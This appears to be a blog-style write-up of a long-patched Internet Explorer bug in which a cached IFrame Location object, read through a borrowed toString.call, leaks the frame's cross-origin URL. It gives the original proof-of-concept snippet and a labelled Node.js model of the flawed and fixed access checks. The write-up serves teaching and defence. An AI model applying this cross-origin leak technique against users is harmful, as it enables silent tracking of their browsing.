A non-crashing deadcall: caching the location object of an IFrame via valueOf(), letting the user navigate wherever they wished, and then calling location.toString.call(cachedLocation) revealed the current URL of the IFrame — regardless of which domain it had navigated to. This was a persistent information disclosure.
// iFrame is the child frame's window; execScript is the IE-only window method.
// Step 1: while the child is still same-origin, stash its Location object on the parent.
iFrame.execScript('parent.cachedLocation = location.valueOf();');
// Step 2: navigate the child frame to a cross-origin page.
iFrame.location.replace("http://www.google.com");
// Step 3: any time later, even after further navigation, borrow the parent's own
// toString and invoke it with the cached cross-origin Location as `this`:
function showMyAddress() {
    alert(location.toString.call(cachedLocation));
}
Unlike the crashing deadcalls, the location object persists across navigations — it is the same COM object, updated in place. The toString.call(cachedLocation) returned the current URL string of the IFrame’s location, bypassing the normal cross-origin block on iFrame.location.toString. An attacker could poll this to silently track where a user was browsing inside the IFrame.
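The design flaw here is that the cross-origin check guarded the property lookup (reading toString off the foreign Location) but not the invocation, so a same-origin toString function borrowed from the parent could be pointed at a cached foreign object. The following is an added illustration, not code from the original post and not IE's actual implementation: a toy Node.js model of a Location wrapper whose backing frame state is updated in place on navigation, with the check done either only at lookup (the flaw) or also at call time inside toString (the fix). All origins, URLs and function names (createFrame, navigate, makeLocation, simulate) are constructed for this example.

```javascript
// Added illustration (not the original post's code): a toy model of a Location object
// whose backing frame state is updated in place on navigation. The cross-origin check is
// done either only at property lookup (the flaw described above) or also at call time
// inside toString (the fix). All origins and URLs below are constructed.

function originOf(href) {
  return new URL(href).origin;
}

// One frame is a single mutable object, like the in-place-updated COM object.
function createFrame(href) {
  return { href, origin: originOf(href) };
}

function navigate(frame, href) {
  frame.href = href;
  frame.origin = originOf(href);
}

// Build the Location wrapper that script running in `callerOrigin` receives for `frame`.
// checkOnCall=false: only the property lookup is guarded (vulnerable design).
// checkOnCall=true: toString also verifies the origin of the object it is invoked on.
function makeLocation(frame, callerOrigin, checkOnCall) {
  function toString() {
    // `this` may be any Location the caller managed to obtain earlier, not the one
    // this function was looked up on, so the origin must be re-checked here.
    const target = this;
    if (checkOnCall && target.frame.origin !== callerOrigin) {
      throw new Error('SecurityError');
    }
    return target.frame.href;
  }
  const loc = {
    frame,
    valueOf() { return loc; }, // hands out a reference that can be cached
  };
  Object.defineProperty(loc, 'toString', {
    get() {
      // The "normal cross-origin block": guard the lookup against the frame's current origin.
      if (frame.origin !== callerOrigin) throw new Error('SecurityError');
      return toString;
    },
  });
  return loc;
}

// Replay the scenario from the post: cache the child's Location while it is same-origin,
// navigate it elsewhere, then try to read the URL directly and via a borrowed toString.
// Returns either the URL string (a leak) or the error name for each attempt.
function simulate(checkOnCall) {
  const attacker = 'http://attacker.example';
  const parentFrame = createFrame('http://attacker.example/top');
  const childFrame = createFrame('http://attacker.example/child'); // same-origin at first
  const ownLocation = makeLocation(parentFrame, attacker, checkOnCall);
  const cachedLocation = makeLocation(childFrame, attacker, checkOnCall).valueOf();

  navigate(childFrame, 'https://www.google.com/search?q=private'); // now cross-origin

  const attempt = (fn) => { try { return fn(); } catch (e) { return e.message; } };
  return {
    direct: attempt(() => cachedLocation.toString()),
    viaCall: attempt(() => ownLocation.toString.call(cachedLocation)),
  };
}

console.log(JSON.stringify({ vulnerable: simulate(false), fixed: simulate(true) }, null, 2));
```

With checkOnCall=false the direct read is blocked but the borrowed-toString read returns the child's current URL, which is the leak the post describes; with checkOnCall=true both paths throw. The general lesson is that an access check on a long-lived object must be evaluated against the object's state at the moment of each operation, not only when a reference or method is first handed out.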
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.